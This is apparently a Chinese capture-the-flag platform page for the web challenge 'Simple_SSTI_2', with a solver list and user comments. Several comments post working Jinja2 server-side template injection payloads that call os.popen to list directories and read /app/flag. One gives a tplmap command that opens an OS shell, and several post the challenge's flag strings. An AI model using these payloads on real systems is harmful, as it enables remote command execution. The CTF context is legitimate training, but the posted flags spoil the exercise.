Simple_SSTI_2WEB 未解决
分数:
10
金币:
3
题目作者:
valecalida
一 血:
Tokeii
一血奖励:
3金币
解 决:
16470
提 示:
描 述:
Simple_SSTI_2
评分(15)
解题动态
shu-jia 攻破了该题 2天前
avaclaire 攻破了该题 2天前
cha8e1 攻破了该题 3天前
yehlg 攻破了该题 4天前
edisonya 攻破了该题 5天前
finsh 攻破了该题 6天前
pangjinqi 攻破了该题 6天前
mmhhdm 攻破了该题 6天前
wujita01 攻破了该题 7天前
Hackerchen 攻破了该题 7天前
影人sha 攻破了该题 7天前
drameet 攻破了该题 7天前
Hoshisyy 攻破了该题 11天前
SuperFan 攻破了该题 11天前
ikunqq 攻破了该题 12天前
十里故清云 攻破了该题 13天前
0n1y 攻破了该题 14天前
bugku2026 攻破了该题 15天前
kr2yh 攻破了该题 15天前
评论
梦若浮生 3年前
举报
http://114.67.175.224:17803/?flag={{lipsum.__globals__.os.popen('cat /app/flag').read()}}
dodobird 3年前
举报
flag{868be7e5edab8f71e023a1e642e7aad2}
L_ergo 3年前
举报
flag{968946be81a675c24c0bef227383ba70}
shansang 3年前
举报
python3 ./tplmap.py -u http://114.67.175.224:13633/?flag --engine=Jinja2 --os-shell
热热热热热若 3年前
举报
flag{23de1e599ad6abcc6c446e355e72c807}
starrabbit 3年前
举报
也可通过tplmap工具直接获取权限
hxl223 3年前
举报
flag{23de1e599ad6abcc6c446e355e72c807}
nepw 3年前
举报
通过{{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}读取系统文件 通过{{ config.__class__.__init__.__globals__['os'].popen('ls ../app').read() }}读取读取app目录下的文件,发现存在flag文件 通过{{ config.__c
DK2021 3年前
举报
/?flag={{ config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read() }}
453137 3年前
举报
flag={{ config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read() }}